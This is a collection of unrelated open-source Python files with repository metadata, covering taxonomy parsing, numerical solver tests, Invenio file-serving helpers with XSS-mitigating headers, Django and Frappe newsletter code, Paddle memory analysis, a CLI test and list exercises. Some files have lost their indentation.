animal_pref = 'Eukaryota;Opisthokonta;Holozoa;Metazoa (Animalia);'
pl_pref = 'Eukaryota;Archaeplastida;Chloroplastida;Charophyta;Phragmoplastophyta;Streptophyta;'
mito_pref = 'Bacteria;Proteobacteria;Alphaproteobacteria;Rickettsiales;Mitochondria;'
chloro_pref = 'Bacteria;Cyanobacteria;Chloroplast;'
trim_pref = (fung_pref, animal_pref, pl_pref, mito_pref, chloro_pref)
namepath_to_id_pair = {}
with io.open(expect_tax_fp, 'rU', encoding='utf-8') as inp:
eh = 'primaryAccession\tstart\tstop\tpath\torganism_name\ttaxid\n'
iinp = iter(inp)
h = next(iinp)
if h != eh:
raise ValueError("Unexpected header: {}".format(h))
for n, line in enumerate(iinp):
ls = line.strip()
if not ls:
continue
prim_acc, start, stop, path, name, tax_id = ls.split('\t')
if n % 10000 == 0:
_LOG.info("read taxon {} '{}' ...".format(n, name))
if prim_acc in acc_to_trim:
tpath = None
for p in trim_pref:
if path.startswith(p):
tpath = p
break
if tpath is None:
                    _LOG.info('deleting untrimmable record {}'.format(prim_acc))
continue
else:
all_names = gen_all_namepaths(path, '', prim_acc)
else:
all_names = gen_all_namepaths(path, name, prim_acc)
for np in all_names:
# _LOG.info('np = {}'.format(np))
assert not np[0][0].endswith(';')
name_path, proposed_id = np
stored = namepath_to_id_pair.setdefault(name_path, [None, None])
if stored[0] is None:
if proposed_id in preferred_ids:
stored[0], stored[1] = proposed_id, proposed_id
elif stored[1] is None or proposed_id < stored[1]:
stored[1] = proposed_id
for pid in namepath_to_id_pair.values():
if pid[0] is None:
pid[0] = pid[1]
part_map_to_namepath = {
'Archaeplastida': ('Eukaryota', 'Archaeplastida'),
'Chloroplastida': ('Eukaryota;Archaeplastida', 'Chloroplastida'),
'Glaucophyta': ('Eukaryota;Archaeplastida', 'Glaucophyta'),
'Rhodophyta': ('Eukaryota;Archaeplastida', 'Rhodophyceae'),
'Haptophyta': ('Eukaryota', 'Haptophyta'),
'Eukaryota': ('', 'Eukaryota'),
'Archaea': ('', 'Archaea'),
'Bacteria': ('', 'Bacteria'),
'SAR': ('Eukaryota', 'SAR'),
}
part_name_to_silva_id = {}
for part_name, path_name in part_map_to_namepath.items():
part_name_to_silva_id[part_name] = [namepath_to_id_pair[path_name][0]]
to_par = itd.to_par
to_children = itd.to_children
to_name = itd.to_name
npk = list(namepath_to_id_pair.keys())
npk.sort()
to_par["0"] = None
to_children["0"] = []
to_name["0"] = "Life"
itd.root_nodes.add("0")
for name_path in npk:
silva_id = namepath_to_id_pair[name_path][0]
par_name = name_path[0]
if par_name:
if ';' in par_name:
pnpl = par_name.split(';')
pn = pnpl[-1]
anc_part = ';'.join(pnpl[:-1])
pnp = (anc_part, pn)
else:
pnp = ('', par_name)
par_silva_id = namepath_to_id_pair[pnp][0]
else:
par_silva_id = "0"
if silva_id in to_par:
m = '{} remains mapped to ({}, {}) rather than ({}, {})'
_LOG.warning(
m.format(silva_id, to_par[silva_id], to_name[silva_id], par_silva_id, name_path[1]))
else:
to_par[silva_id] = par_silva_id
to_children.setdefault(par_silva_id, []).append(silva_id)
to_name[silva_id] = name_path[1]
_LOG.info('{} SILVA ids stored'.format(len(to_name)))
return part_name_to_silva_id
# noinspection PyAbstractClass
class SilvaIdListWrapper(TaxonomyWrapper):
resource_type = 'id list'
schema = {'id list'}
# noinspection PyAbstractClass
class SilvaToNCBIMappingListWrapper(TaxonomyWrapper):
resource_type = "id to ncbi mapping"
schema = {"id to ncbi mapping", "silva taxmap", "fasta silva taxmap"}
_norm_filename = 'ncbi_taxmap.tsv'
def __init__(self, obj, parent=None, refs=None):
TaxonomyWrapper.__init__(self, obj, parent=parent, refs=refs)
def parse_acc_to_trim_from_ncbi(self):
trimmed_pref = {'root;cellular organisms;Eukaryota;Opisthokonta;Fungi;',
'root;cellular organisms;Eukaryota;Opisthokonta;Metazoa;',
'root;cellular organisms;Eukaryota;Viridiplantae;',
'Eukaryota;Archaeplastida;Chloroplastida;',
'Eukaryota;Opisthokonta;Holozoa;Metazoa;',
'Eukaryota;Opisthokonta;Nucletmycea;Fungi;',
}
to_trim = set()
with io.open(self.normalized_filepath, 'rU', encoding='utf-8') as inp:
for n, line in enumerate(inp):
ls = line.strip()
if not ls:
continue
prim_acc, start, stop, path, name = ls.split('\t')
if n % 10000 == 0:
_LOG.info("scanned taxon {} '{}' ...".format(n, name))
for pref in trimmed_pref:
if path.startswith(pref):
to_trim.add(prim_acc)
break
return to_trim
class SilvaWrapper(TaxonomyWrapper):
resource_type = 'id list'
schema = {"silva taxmap"}
def __init__(self, obj, parent=None, refs=None):
TaxonomyWrapper.__init__(self, obj, parent=parent, refs=refs)
def normalize(self):
normalize_silva_taxonomy(self.unpacked_filepath, self.normalized_filedir, self)
def get_primary_partition_map(self):
return read_as_json(os.path.join(self.normalized_filedir, GEN_MAPPING_FILENAME))
|
mtholder/taxalotl
|
taxalotl/parsing/silva.py
|
Python
|
bsd-2-clause
| 9,865
|
from dolfin import *
import petsc4py
import sys
petsc4py.init(sys.argv)
from petsc4py import PETSc
import CheckPetsc4py as CP
import splitCG as cg
n = 2**4
mesh = UnitSquareMesh(n,n)
V = FunctionSpace(mesh,"CG",1)
u = TestFunction(V)
v = TrialFunction(V)
A = assemble(inner(grad(u),grad(v))*dx)
M = assemble(inner(u,v)*dx)
AM = assemble(inner(grad(u),grad(v))*dx+inner(u,v)*dx)
AM = CP.Assemble(AM)
A = CP.Assemble(A)
M = CP.Assemble(M)
u, b = AM.getVecs()
b.set(1)
b = AM*b
u.set(0)
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
pc = ksp.getPC()
ksp.setType('cg')
pc.setType('none')
ksp.setOperators(AM,AM)
ksp.solve(b,u)
print u.array, ksp.its
u, b = AM.getVecs()
b.set(1)
b = (A+M)*b
u.set(0)
kspS = PETSc.KSP()
kspS.create(comm=PETSc.COMM_WORLD)
pcS = kspS.getPC()
kspS.setType('cg')
pcS.setType('none')
P = PETSc.Mat().createPython([A.size[0], A.size[0]])
P.setType('python')
p = cg.SplitMulti(A,M)
P.setPythonContext(p)
kspS.setOperators(P)
kspS.solve(b,u)
print u.array, kspS.its
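# Sketch (added for illustration): the splitCG.SplitMulti context used above
# is not shown in this file; a minimal petsc4py Python-matrix context that
# applies y <- (A + M) x would look roughly like this (hypothetical, the
# real class may differ):
#
# class SplitMulti(object):
#     def __init__(self, A, M):
#         self.A, self.M = A, M
#     def mult(self, mat, x, y):
#         self.A.mult(x, y)      # y = A x
#         t = y.duplicate()
#         self.M.mult(x, t)      # t = M x
#         y.axpy(1.0, t)         # y = A x + M x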
|
wathen/PhD
|
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitCG/test.py
|
Python
|
mit
| 1,007
|
from FireGirlPathway import *
#create new Pathway, id=0, default policy, default as FireGirlPathway
ls = FireGirlPathway(0)
ls.generateNewPathway()
print '{0:6} {1:12} {2:12} {3:12} {4:12} {5:12} {6:12}'.format(
'Year', 'Choice', 'Cells Brnd', 'Timb Loss', 'Sup. Cost', 'Harvest Totl', 'Growth Totl')
for y in range(500):
ls.doOneYear()
choice = ls.ignitions[y].getChoice()
#'timber loss', 'cells burned', 'suppression cost', 'burn time'
outcomes = ls.ignitions[y].getOutcomes()
    supcost = ls.yearly_suppression_costs[y]
growth = ls.yearly_growth_totals[y]
harvest = ls.yearly_logging_totals[y]
    print '{0:6} {1:12} {2:12} {3:12} {4:12} {5:12} {6:12}'.format(
        y, choice, round(outcomes[1]), round(outcomes[0]), round(outcomes[2]), round(harvest), round(growth))
#supcost = ls.ignitions[y].getSuppressionTotal()
#harvest = ls.ignitions[y].getHarvestTotal()
#'{0:12.3f} {1:12.3f} {2:12.3f}'.format(arg1, arg2, arg3)
|
smcgregor/gravity
|
test_script_pathway_models.py
|
Python
|
mpl-2.0
| 976
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2019 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""File serving helpers for Files REST API."""
import mimetypes
import hashlib
import os
import unicodedata
import warnings
from flask import current_app, make_response, request
from time import time
from urllib.parse import urlsplit
from werkzeug.datastructures import Headers
from werkzeug.urls import url_quote
from werkzeug.wsgi import FileWrapper
MIMETYPE_TEXTFILES = {
'readme'
}
MIMETYPE_WHITELIST = {
'audio/mpeg',
'audio/ogg',
'audio/wav',
'audio/webm',
'image/gif',
'image/jpeg',
'image/png',
'image/tiff',
'text/plain',
}
"""List of whitelisted MIME types.
.. warning::
Do not add new types to this list unless you know what you are doing. You
could potentially open up for XSS attacks.
"""
MIMETYPE_PLAINTEXT = {
'application/javascript',
'application/json',
'application/xhtml+xml',
'application/xml',
'text/css',
'text/csv',
'text/html',
'image/svg+xml',
}
def chunk_size_or_default(chunk_size):
"""Use default chunksize if not configured."""
return chunk_size or 5 * 1024 * 1024 # 5MiB
def send_stream(stream, filename, size, mtime, mimetype=None, restricted=True,
as_attachment=False, etag=None, content_md5=None,
chunk_size=None, conditional=True, trusted=False):
"""Send the contents of a file to the client.
.. warning::
It is very easy to be exposed to Cross-Site Scripting (XSS) attacks if
you serve user uploaded files. Here are some recommendations:
1. Serve user uploaded files from a separate domain
(not a subdomain). This way a malicious file can only attack
other user uploaded files.
2. Prevent the browser from rendering and executing HTML files (by
setting ``trusted=False``).
3. Force the browser to download the file as an attachment
(``as_attachment=True``).
:param stream: The file stream to send.
:param filename: The file name.
:param size: The file size.
:param mtime: A Unix timestamp that represents last modified time (UTC).
:param mimetype: The file mimetype. If ``None``, the module will try to
guess. (Default: ``None``)
:param restricted: If the file is not restricted, the module will set the
cache-control. (Default: ``True``)
:param as_attachment: If the file is an attachment. (Default: ``False``)
:param etag: If defined, it will be set as HTTP E-Tag.
:param content_md5: If defined, a HTTP Content-MD5 header will be set.
:param chunk_size: The chunk size.
:param conditional: Make the response conditional to the request.
(Default: ``True``)
:param trusted: Do not enable this option unless you know what you are
doing. By default this function will send HTTP headers and MIME types
        that prevent your browser from rendering e.g. an HTML file which could
contain a malicious script tag.
(Default: ``False``)
:returns: A Flask response instance.
"""
chunk_size = chunk_size_or_default(chunk_size)
# Guess mimetype from filename if not provided.
if mimetype is None and filename:
mimetype = mimetypes.guess_type(filename)[0]
if mimetype is None:
mimetype = 'application/octet-stream'
# Construct headers
headers = Headers()
headers['Content-Length'] = size
if content_md5:
headers['Content-MD5'] = content_md5
if not trusted:
# Sanitize MIME type
mimetype = sanitize_mimetype(mimetype, filename=filename)
# See https://www.owasp.org/index.php/OWASP_Secure_Headers_Project
# Prevent JavaScript execution
headers['Content-Security-Policy'] = "default-src 'none';"
# Prevent MIME type sniffing for browser.
headers['X-Content-Type-Options'] = 'nosniff'
# Prevent opening of downloaded file by IE
headers['X-Download-Options'] = 'noopen'
# Prevent cross domain requests from Flash/Acrobat.
headers['X-Permitted-Cross-Domain-Policies'] = 'none'
# Prevent files from being embedded in frame, iframe and object tags.
headers['X-Frame-Options'] = 'deny'
# Enable XSS protection (IE, Chrome, Safari)
headers['X-XSS-Protection'] = '1; mode=block'
# Force Content-Disposition for application/octet-stream to prevent
# Content-Type sniffing.
if as_attachment or mimetype == 'application/octet-stream':
# See https://github.com/pallets/flask/commit/0049922f2e690a6d
try:
filenames = {'filename': filename.encode('latin-1')}
except UnicodeEncodeError:
filenames = {'filename*': "UTF-8''%s" % url_quote(filename)}
encoded_filename = (unicodedata.normalize('NFKD', filename)
.encode('latin-1', 'ignore'))
if encoded_filename:
filenames['filename'] = encoded_filename
headers.add('Content-Disposition', 'attachment', **filenames)
else:
headers.add('Content-Disposition', 'inline')
# Construct response object.
rv = current_app.response_class(
FileWrapper(stream, buffer_size=chunk_size),
mimetype=mimetype,
headers=headers,
direct_passthrough=True,
)
# Set etag if defined
if etag:
rv.set_etag(etag)
# Set last modified time
if mtime is not None:
rv.last_modified = int(mtime)
# Set cache-control
if not restricted:
rv.cache_control.public = True
cache_timeout = current_app.get_send_file_max_age(filename)
if cache_timeout is not None:
rv.cache_control.max_age = cache_timeout
rv.expires = int(time() + cache_timeout)
if conditional:
rv = rv.make_conditional(request)
return rv
def sanitize_mimetype(mimetype, filename=None):
"""Sanitize a MIME type so the browser does not render the file."""
    # Allow a few MIME types such as plain text, images and audio.
if mimetype in MIMETYPE_WHITELIST:
return mimetype
# Rewrite HTML, JavaScript, CSS etc to text/plain.
if mimetype in MIMETYPE_PLAINTEXT or \
(filename and filename.lower() in MIMETYPE_TEXTFILES):
return 'text/plain'
# Default
return 'application/octet-stream'
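# Examples (added for illustration, matching the rules above):
# >>> sanitize_mimetype('image/png')
# 'image/png'                       # whitelisted, passed through
# >>> sanitize_mimetype('text/html')
# 'text/plain'                      # renderable types are downgraded
# >>> sanitize_mimetype('application/pdf')
# 'application/octet-stream'        # everything else forces a download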
def make_path(base_uri, path, filename, path_dimensions, split_length):
"""Generate a path as base location for file instance.
:param base_uri: The base URI.
    :param path: The relative path.
    :param filename: The file name appended at the end of the path.
:param path_dimensions: Number of chunks the path should be split into.
:param split_length: The length of any chunk.
:returns: A string representing the full path.
"""
assert len(path) > path_dimensions * split_length
uri_parts = []
for i in range(path_dimensions):
uri_parts.append(path[0:split_length])
path = path[split_length:]
uri_parts.append(path)
uri_parts.append(filename)
return os.path.join(base_uri, *uri_parts)
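# Example (added for illustration): with two path dimensions of length two,
# a checksum-like key is sharded into nested directories:
# >>> make_path('/data', 'deadbeef', 'f.txt', 2, 2)
# '/data/de/ad/beef/f.txt'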
def compute_md5_checksum(stream, **kwargs):
"""Get helper method to compute MD5 checksum from a stream.
:param stream: The input stream.
:returns: The MD5 checksum.
"""
return compute_checksum(stream, 'md5', hashlib.md5(), **kwargs)
def compute_checksum(stream, algo, message_digest, chunk_size=None,
progress_callback=None):
"""Get helper method to compute checksum from a stream.
:param stream: File-like object.
:param algo: Identifier for checksum algorithm.
    :param message_digest: A message digest instance.
:param chunk_size: Read at most size bytes from the file at a time.
:param progress_callback: Function accepting one argument with number
of bytes read. (Default: ``None``)
:returns: The checksum.
"""
chunk_size = chunk_size_or_default(chunk_size)
bytes_read = 0
while 1:
chunk = stream.read(chunk_size)
if not chunk:
if progress_callback:
progress_callback(bytes_read)
break
message_digest.update(chunk)
bytes_read += len(chunk)
if progress_callback:
progress_callback(bytes_read)
return "{0}:{1}".format(algo, message_digest.hexdigest())
def populate_from_path(bucket, source, checksum=True, key_prefix='',
chunk_size=None):
"""Populate a ``bucket`` from all files in path.
:param bucket: The bucket (instance or id) to create the object in.
:param source: The file or directory path.
:param checksum: If ``True`` then a MD5 checksum will be computed for each
file. (Default: ``True``)
:param key_prefix: The key prefix for the bucket.
:param chunk_size: Chunk size to read from file.
    :returns: An iterator over all
:class:`invenio_files_rest.models.ObjectVersion` instances.
"""
from .models import FileInstance, ObjectVersion
def create_file(key, path):
"""Create new ``ObjectVersion`` from path or existing ``FileInstance``.
        It checks the MD5 checksum and size of existing ``FileInstance`` records.
"""
key = key_prefix + key
if checksum:
file_checksum = compute_md5_checksum(
open(path, 'rb'), chunk_size=chunk_size)
file_instance = FileInstance.query.filter_by(
checksum=file_checksum, size=os.path.getsize(path)
).first()
if file_instance:
return ObjectVersion.create(
bucket, key, _file_id=file_instance.id
)
return ObjectVersion.create(bucket, key, stream=open(path, 'rb'))
if os.path.isfile(source):
yield create_file(os.path.basename(source), source)
else:
for root, dirs, files in os.walk(source, topdown=False):
for name in files:
filename = os.path.join(root, name)
assert filename.startswith(source)
parts = [p for p in filename[len(source):].split(os.sep) if p]
yield create_file('/'.join(parts), os.path.join(root, name))
def create_file_streaming_redirect_response(obj):
"""Redirect response generating function."""
warnings.warn('This streaming does not support multiple storage backends.')
response = make_response()
redirect_url_base = '/user_files/'
redirect_url_key = urlsplit(obj.file.uri).path
response.headers['X-Accel-Redirect'] = redirect_url_base + \
redirect_url_key[1:]
return response
|
inveniosoftware/invenio-files-rest
|
invenio_files_rest/helpers.py
|
Python
|
mit
| 10,805
|
from django.test import TestCase
from mock import patch
from news.backends.common import NewsletterException
from news.models import Newsletter
from news.tasks import confirm_user, mogrify_message_id, send_message
class TestSendMessage(TestCase):
@patch('news.tasks.ExactTarget')
def test_caching_bad_message_ids(self, mock_ExactTarget):
"""Bad message IDs are cached so we don't try to send to them again"""
mock_et = mock_ExactTarget()
exc = NewsletterException()
exc.message = 'Invalid Customer Key'
mock_et.trigger_send.side_effect = exc
message_id = "MESSAGE_ID"
for i in range(10):
send_message(message_id, 'email', 'token', 'format')
mock_et.trigger_send.assert_called_once_with('MESSAGE_ID', {
'EMAIL_ADDRESS_': 'email',
'TOKEN': 'token',
'EMAIL_FORMAT_': 'format',
})
class TestSendWelcomes(TestCase):
def test_mogrify_message_id_text(self):
"""Test adding lang and text format to message ID"""
result = mogrify_message_id("MESSAGE", "en", "T")
expect = "en_MESSAGE_T"
self.assertEqual(expect, result)
def test_mogrify_message_id_html(self):
"""Test adding lang and html format to message ID"""
result = mogrify_message_id("MESSAGE", "en", "H")
expect = "en_MESSAGE"
self.assertEqual(expect, result)
def test_mogrify_message_id_no_lang(self):
"""Test adding no lang and format to message ID"""
result = mogrify_message_id("MESSAGE", None, "T")
expect = "MESSAGE_T"
self.assertEqual(expect, result)
def test_mogrify_message_id_long_lang(self):
"""Test adding long lang and format to message ID"""
result = mogrify_message_id("MESSAGE", "en-US", "T")
expect = "en_MESSAGE_T"
self.assertEqual(expect, result)
def test_mogrify_message_id_upcase_lang(self):
"""Test adding uppercase lang and format to message ID"""
result = mogrify_message_id("MESSAGE", "FR", "T")
expect = "fr_MESSAGE_T"
self.assertEqual(expect, result)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_text_welcome(self, apply_updates, send_message):
"""Test sending the right welcome message"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en,ru',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'ru'
format = 'T'
# User who prefers Russian Text messages
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
expected_welcome = "%s_%s_%s" % (lang, welcome, format)
send_message.delay.assert_called_with(expected_welcome, email, token, format)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_html_welcome(self, apply_updates, send_message):
"""Test sending the right welcome message"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en,ru',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'RU' # This guy had an uppercase lang code for some reason
format = 'H'
# User who prefers Russian HTML messages
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
# Lang code is lowercased. And we don't append anything for HTML.
expected_welcome = "%s_%s" % (lang.lower(), welcome)
send_message.delay.assert_called_with(expected_welcome, email, token, format)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_bad_lang_welcome(self, apply_updates, send_message):
"""Test sending welcome in english if user wants a lang that
our newsletter doesn't support"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en,ru',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'fr'
format = 'H'
# User who prefers French HTML messages
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
# They're getting English. And we don't append anything for HTML.
expected_welcome = "en_%s" % welcome
send_message.delay.assert_called_with(expected_welcome, email, token, format)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_long_lang_welcome(self, apply_updates, send_message):
"""Test sending welcome in pt if the user wants pt and the newsletter
supports pt-Br"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en,ru,pt-Br',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'pt'
format = 'H'
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
# They're getting pt. And we don't append anything for HTML.
expected_welcome = "pt_%s" % welcome
send_message.delay.assert_called_with(expected_welcome, email, token, format)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_other_long_lang_welcome(self, apply_updates, send_message):
"""Test sending welcome in pt if the user wants pt-Br and the
newsletter supports pt"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en,ru,pt',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'pt-Br'
format = 'H'
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
# They're getting pt. And we don't append anything for HTML.
expected_welcome = "pt_%s" % welcome
send_message.delay.assert_called_with(expected_welcome, email, token, format)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_one_lang_welcome(self, apply_updates, send_message):
"""If a newsletter only has one language, the welcome message
still gets a language prefix"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'pt-Br'
format = 'H'
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
expected_welcome = 'en_' + welcome
send_message.delay.assert_called_with(expected_welcome, email, token, format)
|
pmclanahan/basket
|
news/tests/test_send_welcomes.py
|
Python
|
mpl-2.0
| 8,291
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import numpy as np
def get_var_and_memory_size(block, var_name, batch_size=None):
var = block._find_var_recursive(var_name)
assert var is not None, "Variable {} cannot be found".format(var_name)
assert var.type == core.VarDesc.VarType.LOD_TENSOR, "Variable {} is not Tensor".format(
var_name)
shape = list(var.shape)
if not shape:
return var, 0
has_none = False
for i, s in enumerate(shape):
if s is None or s < 0:
assert not has_none
shape[i] = batch_size
has_none = True
assert all(
[s >= 0 for s in shape]), "shape {} is not deterministic".format(shape)
mem_size = int(np.prod(shape)) * core.size_of_dtype(var.dtype)
return var, mem_size
def pre_allocate_memory(size, place):
t = core.LoDTensor()
t._set_dims([size])
t._mutable_data(place, core.VarDesc.VarType.INT8)
del t
# NOTE: does not consider inplace yet.
def get_max_memory_info(program, batch_size=None):
    assert program.num_blocks == 1, "only supports analyzing programs with a single block"
cur_tmp_mem = 0
max_tmp_mem = 0
max_persistable_mem = 0
visited_vars = set()
alived_vars = []
block = program.global_block()
gc_vars = core._get_eager_deletion_vars(program.desc, [])[0]
for i, op in enumerate(block.ops):
var_names = op.input_arg_names + op.output_arg_names
for var_name in var_names:
if var_name in visited_vars:
continue
visited_vars.add(var_name)
var, mem_size = get_var_and_memory_size(block, var_name, batch_size)
if var.persistable:
max_persistable_mem += mem_size
else:
cur_tmp_mem += mem_size
max_tmp_mem = max(max_tmp_mem, cur_tmp_mem)
cur_gc_vars = gc_vars[i]
for var_name in var_names:
if var_name not in cur_gc_vars:
continue
_, mem_size = get_var_and_memory_size(block, var_name, batch_size)
cur_tmp_mem -= mem_size
return max_tmp_mem, max_persistable_mem
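# Illustrative usage (added; assumes a single-block static-graph `program`
# built elsewhere, with any -1 batch dimensions resolved by batch_size):
#
# max_tmp, max_persistable = get_max_memory_info(program, batch_size=32)
# pre_allocate_memory(max_tmp + max_persistable, core.CPUPlace())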
|
luotao1/Paddle
|
python/paddle/fluid/memory_analysis.py
|
Python
|
apache-2.0
| 2,753
|
#!/usr/bin/env python
#
# Copyright 2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from lxml import etree
import structlog
from netconf.nc_rpc.rpc import Rpc
import netconf.nc_common.error as ncerror
log = structlog.get_logger()
class Lock(Rpc):
def __init__(self, request, request_xml, grpc_client, session,
capabilities):
super(Lock, self).__init__(request, request_xml, grpc_client,
session, capabilities)
self._validate_parameters()
def execute(self):
log.info('Lock-request', session=self.session.session_id)
if self.rpc_response.is_error:
return self.rpc_response
def _validate_parameters(self):
log.info('validate-parameters', session=self.session.session_id)
|
opencord/voltha
|
netconf/nc_rpc/base/lock.py
|
Python
|
apache-2.0
| 1,327
|
# this example uses a CSV file with the data for the classification
# imports added so the example is runnable; Sample and Point are assumed to
# come from openturns, LibSVMClassification and LibSVM from otsvm
import os
from openturns import *
from otsvm import *
# we retrieve the sample from the file sample.csv
path = os.path.abspath(os.path.dirname(__file__))
dataInOut = Sample().ImportFromCSVFile(path + "/sample.csv")
# we create dataIn and dataOut
dataIn = Sample(861, 2)
dataOut = Sample(861, 1)
# we build the input Sample and the output Sample because we must separate
# dataInOut
for i in range(861):
a = dataInOut[i]
b = Point(2)
b[0] = a[1]
b[1] = a[2]
dataIn[i] = b
dataOut[i] = int(a[0])
# list of C parameter
cp = [0.000001, 0.00001, 0.0001, 0.001, 0.01, 0.1, 1, 10, 100]
# list of gamma parameter in kernel function
gamma = [0.000001, 0.00001, 0.0001, 0.001, 0.01, 0.1, 1, 10, 100]
# create the Classification Problem
Regression = LibSVMClassification(dataIn, dataOut)
Regression.setKernelType(LibSVM.NormalRbf)
Regression.setTradeoffFactor(cp)
Regression.setKernelParameter(gamma)
# compute the classification
Regression.run()
print "#######################"
print "Results with Samples I/O"
print "Accuracy(p.c.)=", Regression.getAccuracy()
|
openturns/otsvm
|
python/test/t_example2.py
|
Python
|
lgpl-3.0
| 1,095
|
import pytest
from click.testing import CliRunner
from coolcommands import cli
@pytest.fixture
def runner():
return CliRunner()
def test_cli(runner):
result = runner.invoke(cli.main)
assert result.exit_code == 0
assert not result.exception
assert result.output.strip() == 'Hello, world.'
def test_cli_with_option(runner):
result = runner.invoke(cli.main, ['--as-cowboy'])
assert not result.exception
assert result.exit_code == 0
assert result.output.strip() == 'Howdy, world.'
def test_cli_with_arg(runner):
result = runner.invoke(cli.main, ['Bradley'])
assert result.exit_code == 0
assert not result.exception
assert result.output.strip() == 'Hello, Bradley.'
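# A minimal click CLI that would satisfy these tests might look like this
# (added sketch; the real coolcommands.cli module may differ):
#
# import click
#
# @click.command()
# @click.argument('name', default='world')
# @click.option('--as-cowboy', is_flag=True, help='Greet as a cowboy.')
# def main(name, as_cowboy):
#     greeting = 'Howdy' if as_cowboy else 'Hello'
#     click.echo('{0}, {1}.'.format(greeting, name))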
|
bradleybossard/cool-cli-tool
|
tests/test_cli.py
|
Python
|
apache-2.0
| 721
|
from __future__ import unicode_literals
import frappe
from frappe.utils.verified_command import verify_request
from frappe.email.doctype.newsletter.newsletter import confirmed_unsubscribe
no_cache = True
def get_context(context):
frappe.flags.ignore_permissions = True
# Called for confirmation.
if "email" in frappe.form_dict:
if verify_request():
user_email = frappe.form_dict["email"]
context.email = user_email
title = frappe.form_dict["name"]
context.email_groups = get_email_groups(user_email)
context.current_group = get_current_groups(title)
context.status = "waiting_for_confirmation"
# Called when form is submitted.
elif "user_email" in frappe.form_dict:
context.status = "unsubscribed"
email = frappe.form_dict['user_email']
email_group = get_email_groups(email)
for group in email_group:
if group.email_group in frappe.form_dict:
confirmed_unsubscribe(email, group.email_group)
# Called on Invalid or unsigned request.
else:
context.status = "invalid"
def get_email_groups(user_email):
    # Return all the email groups in which the email has been registered.
return frappe.get_all("Email Group Member",
fields=["email_group"],
filters={"email": user_email, "unsubscribed": 0})
def get_current_groups(name):
    # Return the group(s) through which the newsletter was sent.
return frappe.db.get_all("Newsletter Email Group",
fields=["email_group"],
filters={"parent":name, "parenttype":"Newsletter"})
|
vjFaLk/frappe
|
frappe/www/unsubscribe.py
|
Python
|
mit
| 1,462
|
#!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
# Additional basic list exercises
# D. Given a list of numbers, return a list where
# all adjacent == elements have been reduced to a single element,
# so [1, 2, 2, 3] returns [1, 2, 3]. You may create a new list or
# modify the passed in list.
def remove_adjacent(nums):
    # Filled-in solution: keep a number only when it differs from the
    # last element already kept.
    result = []
    for num in nums:
        if not result or num != result[-1]:
            result.append(num)
    return result
# E. Given two lists sorted in increasing order, create and return a merged
# list of all the elements in sorted order. You may modify the passed in lists.
# Ideally, the solution should work in "linear" time, making a single
# pass of both lists.
def linear_merge(list1, list2):
    # Filled-in solution: repeatedly pop the smaller front element
    # (see the note below about the cost of pop(0)).
    result = []
    while list1 and list2:
        if list1[0] <= list2[0]:
            result.append(list1.pop(0))
        else:
            result.append(list2.pop(0))
    return result + list1 + list2
# Note: the solution above is kind of cute, but unfortunately list.pop(0)
# is not constant time with the standard python list implementation, so
# the above is not strictly linear time.
